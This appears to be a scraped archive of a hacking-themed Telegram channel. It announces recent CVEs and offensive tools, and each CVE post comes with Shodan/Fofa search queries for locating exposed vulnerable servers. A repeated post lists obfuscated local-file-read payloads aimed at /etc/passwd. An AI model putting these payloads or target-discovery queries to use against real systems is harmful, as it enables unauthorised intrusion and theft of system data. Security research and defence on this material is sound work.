HackTheBox Academy
Closed channel
🔴Learn About #Linux 🔴Learn About #Windows 🔴Learn About #CVE 🔴Learn About #EXPLOIT 🔴Learn About #Vulnerability ✅ADMIN : @NullByte0x1
Show more3 327
Subscribers
No data24 hours
-207 days
-9330 days
Posts Archive
3 327
↔️ CVE-2024-53677
❗️ potentially allowing attackers to execute arbitrary code remotely. This vulnerability arises from flaws in the file upload logic, which can be exploited to perform path traversal and malicious file uploads.
🖥 Exploit - POC
🔎ZoomEye:
app="Apache Struts2"🔎Fofa:
app="Struts2"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
How to Find 𝐌𝐢𝐬𝐜𝐨𝐧𝐟𝐢𝐠𝐮𝐫𝐞𝐝 𝐩𝐡𝐩𝐌𝐲𝐀𝐝𝐦𝐢𝐧.
In this video, We will show you how to find misconfigured phpMyAdmin setups in web applications.❗️ Nuclei-Templates 🔎Shodan:
http.html:"phpMyAdmin"🔎Fofa:
title="phpMyAdmin"⭐️ Big TNX To Video Provider. #Ethical_Hacker #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-50623
❗️ In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unrestricted file upload and download that could lead to remote code execution.
🖥 Exploit - POC
🔎Shodan:
Server: Cleo🔎Fofa:
server="Cleo"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
🎩 CENT
⭐️ Community Edition Nuclei Templates, A Simple Tool That Allows You To Organize All The Nuclei Templates Offered By The Community In One Place.
🖥 GitHub
🛡 Installition:
go install -v github.com/xm1k3/cent@latest
#Tools #Hunt #Security #Nuclei
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
🕷 Payloads for LFR
file:/etc/passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/3 327
🕷 Payloads for LFR
file:/etc/passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/3 327
🩸🩸🫵🩸🩸🩸 💥
🕷 PEN 200 - Penetration Testing with Kali Linux.(2024)
#Course #Pentest #PWK
#Hacking #Ethical_Hacker
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
💻 TLD-Scraping Is A Tool That Allow You To Search For Domain By TLD.
🖥 GitHub
If It Was Useful For You, Dont Forget To Give Star On GitHub.#Tools #Hunt #Security ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
🩸🩸🫵🩸🩸🩸 💥
🕷 Black Hat Tactical OSINT for Pentesters
#Course #Black_Team #Osint
#Hacking #Security #Ethical_Hacker
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
📧 Finding Email Passwords in Dumps with h8mail.
https://www.hackers-arise.com/post/osint-finding-email-passwords-in-dumps-with-h8mail
#OSINT
3 327
😡SQLMAP Command Generator.
✈️ Links:
https://acorzo1983.github.io/SQLMapCG/
#Ethical_Hacker #Exploit #Sql
#Injection #Pentest #Vulnerability
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
What You Guys Need? ♥️
OfCourse That We Need Reactions And Vote.
3 327
↔️ CVE-2024-41713
❗️ Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access.
🖥 Exploit - POC
🔎 Hunter:
product.name="Mitel MiCollab"🔎 Shodan:
http.favicon.hash:-1922044295🔎 fofa:
app="Mitel-Network-Products"#Ethical_Hacker #Exploit #LFI #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-41713
❗️ Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access.
🖥 Exploit - POC
🔎 Hunter:
product.name="Mitel MiCollab"🔎 Shodan:
http.favicon.hash:-1922044295🔎 fofa.info:
app="Mitel-Network-Products"#Ethical_Hacker #Exploit #LFI #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
